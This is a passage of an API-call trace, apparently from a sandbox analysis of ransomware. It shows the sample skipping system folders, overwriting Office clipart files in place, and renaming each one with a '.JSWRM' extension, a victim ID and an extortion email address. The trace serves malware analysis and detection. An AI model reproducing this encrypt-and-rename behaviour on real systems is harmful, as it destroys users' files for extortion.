(lpString1="BD19582_.GIF", lpString2="...") returned 1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="windows") returned -1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="recovery") returned -1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="perflogs") returned -1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="documents and settings") returned -1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="system volume information") returned -1 [0074.674] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="msocache") returned -1 [0074.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19582_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19582_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19582_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0074.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19582_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19582_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19582_.GIF", lpUsedDefaultChar=0x0) returned 12 [0074.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.675] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15733) returned 1 [0074.675] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d70) returned 0x24c1d0 [0074.675] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3d70, lpOverlapped=0x0) returned 1 [0074.738] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.738] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3d70, lpOverlapped=0x0) returned 1 [0074.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.738] CloseHandle (hObject=0x460) returned 1 [0074.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0074.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0074.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0074.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0074.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.739] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.740] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19695_.WMF", cAlternateFileName="")) returned 1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2=".") returned 1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="..") returned 1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="...") returned 1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="windows") returned -1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="recovery") returned -1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="perflogs") returned -1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="documents and settings") returned -1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="system volume information") returned -1 [0074.740] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="msocache") returned -1 [0074.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19695_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19695_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19695_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0074.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19695_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19695_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19695_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0074.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.741] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12982) returned 1 [0074.741] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x32b0) returned 0x24c1d0 [0074.741] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x32b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x32b0, lpOverlapped=0x0) returned 1 [0074.743] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.743] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x32b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x32b0, lpOverlapped=0x0) returned 1 [0074.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.744] CloseHandle (hObject=0x460) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0074.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0074.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0074.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0074.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0074.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.745] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19827_.WMF", cAlternateFileName="")) returned 1 [0074.745] lstrcmpiW (lpString1="BD19827_.WMF", lpString2=".") returned 1 [0074.745] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="..") returned 1 [0074.745] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="...") returned 1 [0074.745] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="windows") returned -1 [0074.745] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="recovery") returned -1 [0074.746] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="perflogs") returned -1 [0074.746] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="documents and settings") returned -1 [0074.746] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.746] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="system volume information") returned -1 [0074.746] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="msocache") returned -1 [0074.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19827_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19827_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19827_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19827_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19827_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19827_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.746] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9710) returned 1 [0074.746] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25e0) returned 0x24c1d0 [0074.746] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x25e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x25e0, lpOverlapped=0x0) returned 1 [0074.748] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.748] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x25e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x25e0, lpOverlapped=0x0) returned 1 [0074.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.749] CloseHandle (hObject=0x460) returned 1 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0074.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0074.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.750] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2244, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD19828_.WMF", cAlternateFileName="")) returned 1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2=".") returned 1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="..") returned 1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="...") returned 1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="windows") returned -1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="recovery") returned -1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="perflogs") returned -1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="documents and settings") returned -1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="system volume information") returned -1 [0074.750] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="msocache") returned -1 [0074.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19828_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19828_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19828_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19828_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD19828_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD19828_.WMF", lpUsedDefaultChar=0x0) 